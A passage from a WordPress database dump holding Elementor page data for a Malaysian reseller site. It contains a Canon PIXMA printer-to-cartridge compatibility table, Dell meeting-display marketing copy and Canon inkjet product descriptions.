PRO-100<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-42 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TR8570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS207<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS307<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5070<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-771 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"736141f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e8521a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS8270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9170<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7091,3326,'_elementor_version','2.5.14'),(8681,3668,'_wp_page_template','template-fullwidth.php'),(8682,3668,'_elementor_data','[{\"id\":\"1428c7d\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"10c0343\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":32.072},\"elements\":[{\"id\":\"c13c1a7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img src=\\\"https:\\/\\/i.dell.com\\/sites\\/csimages\\/Product_Imagery\\/all\\/LFD-franchisepage-responsive_02.jpg\\\" alt=\\\"Transform your meeting space\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"eaf7a1e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":67.928,\"content_position\":\"center\"},\"elements\":[{\"id\":\"c18c5e2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><h2>Transform your meeting space<\\/h2><\\/div><div>Dell, the world\\u2019s number one monitor brand<a class=\\\"technote microcontent\\\" rel=\\\"technotes:monitor-tracker\\\">*<\\/a>, has the tools and technology you need to facilitate teamwork. With our open standards approach and\\u00a0wide variety of displays ranging from 55\\u201d to 86\\u201d, it\\u2019s easy to find and\\u00a0customize a solution\\u00a0that keeps your team engaged and lets your business thrive.<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a29589\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d94f107\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0d139f5\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"02b0460\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#f2f2f2\"},\"elements\":[{\"id\":\"23442a4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"4c2a77c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"text-dark-red\\\" style=\\\"text-align: center;\\\" data-testid=\\\"producthero_module_title\\\">Maximize your team\\u2019s productivity<\\/h2><div class=\\\"top-offset-small bottom-offset-small text-dark-red\\\" style=\\\"text-align: center;\\\" data-testid=\\\"producthero_module_subtitle\\\">Make meetings more efficient with our collaboration-enhancing features and easy connectivity.<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2222c78\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a87a431\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img src=\\\"https:\\/\\/i.dell.com\\/sites\\/csimages\\/Product_Imagery\\/all\\/LFD-franchisepage-responsive_03.jpg\\\" alt=\\\"Maximize your team\\u2019s productivity\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"df1a833\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"229d78d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f465b01\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6dddbc3\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ad2406f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":29.64},\"elements\":[{\"id\":\"f0cdfa8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"alignright\\\" src=\\\"https:\\/\\/i.dell.com\\/sites\\/csimages\\/Product_Imagery\\/all\\/LFD-franchisepage-responsive_04.jpg\\\" alt=\\\"Next-level teamwork\\\" width=\\\"347\\\" height=\\\"256\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de8bd10\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70.36,\"content_position\":\"bottom\"},\"elements\":[{\"id\":\"de42688\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><h2>Next-level teamwork<\\/h2><\\/div><div><strong>More ways to interact:<\\/strong>\\u00a0Group collaboration is more seamless and intuitive than ever with our interactive monitors<a class=\\\"technote microcontent\\\" rel=\\\"technotes:available-monitors\\\">*<\\/a>. And, a simple touch of your hand or swipe of a stylus allows you to experience real-time interaction with virtually zero lag.<br \\/><br \\/><\\/div><div><p><strong>Collaboration solutions:<\\/strong>\\u00a0Annotate, collaborate and whiteboard with included software like DisplayNote and FlatFrog<a class=\\\"technote microcontent\\\" rel=\\\"technotes:available-monitors\\\">*<\\/a>.<br \\/><br \\/><strong>Collaboration for all:<\\/strong>\\u00a0Dell Screen Drop feature<a class=\\\"technote microcontent\\\" rel=\\\"technotes:available-monitors\\\">*<\\/a>\\u00a0lets you lower the displayed image so that it\\u2019s easy to reach, with touch sensors on either side of the display for three additional height settings to fit people working from varying heights.<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5029420\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"b8e6817\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"29544d8\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(7094,3327,'_wp_page_template','template-fullwidth.php'),(7095,3327,'_elementor_edit_mode','builder'),(7096,3327,'_elementor_template_type','post'),(7097,3327,'_elementor_data','[{\"id\":\"9ac79cf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2a109eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d59285\",\"elType\":\"widget\",\"settings\":{\"title\":\"Injet Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca9ead8\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"9a9d292\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"align\":\"center\"},\"elements\":[{\"id\":\"6ad8678\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E560 \\/ E560R\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70128a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\",\"id\":2345}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"509ac9b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Advanced Wireless All-In-One with Auto Duplex\\u00a0Printing for Low-Cost Printing<\\/p><p>The Ink Efficient E560 \\/ E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.<\\/p><p>Available in Black and Red.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO Standard print speed (A4): up to 9.9ipm black \\/ 5.7ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi<\\/p><p>Recommended print volume: 80 - 400 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1ba38c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9b84d1c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"37\",\"bottom\":\"37\",\"left\":\"37\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"19ec1cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d3a1ece\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E4270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47167d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\",\"id\":2346}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"c56690e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing<\\/p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.<\\/p><p>Print, Scan, Copy, Fax<\\/p><p>ISO standard print speed (A4): 8.8ipm black \\/ 4.4ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct<\\/p><p>Recommended print volume: 50 - 200 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"189f9a2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"df0825f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"11\\\" ]<\\/span><\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"31\",\"right\":\"31\",\"bottom\":\"31\",\"left\":\"31\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"692b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a99e262\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS9570\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6a04479\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\",\"id\":2347}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ab42ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>A3 Wireless Photo Printer with Large 4.3\\u201d Touch-Screen and Auto Document Feeder<\\/p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless\\/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 80 - 300 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"657c5e2\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1c9048c\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS8270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e5da999\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\",\"id\":2348}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8c06b04\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless Photo All-In-One with Large 4.3\\u201d Touch-Screen and Auto Duplex Printing<\\/p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.<\\/p><p>Available in Black, Red and White.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 30 - 100 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"89b9be8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center><\\/center><center><\\/center><center><\\/center><center><\\/center><center><\\/center><center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"11\",\"right\":\"11\",\"bottom\":\"11\",\"left\":\"11\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e19c5ed\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"48b8328\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"619d0d9\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G2010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b641ed3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\",\"id\":2349}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"cb6e9e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f95d9d7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ef95652\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"72caeea\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G4010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a96790\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/095399e7118a4e898b6df8c1808358de_g4010_03.png\",\"id\":2351}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"bc59f5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost.<\\/p><p>Print, Scan, Copy and Fax<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49effc0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"79b85a4\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G1010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4266d0e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\",\"id\":2352}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"79cfa28\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Printer for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) \\/ 5.0ipm (colour)<\\/p><p>Photo Speed (4 x 6\\\"): 60sec. 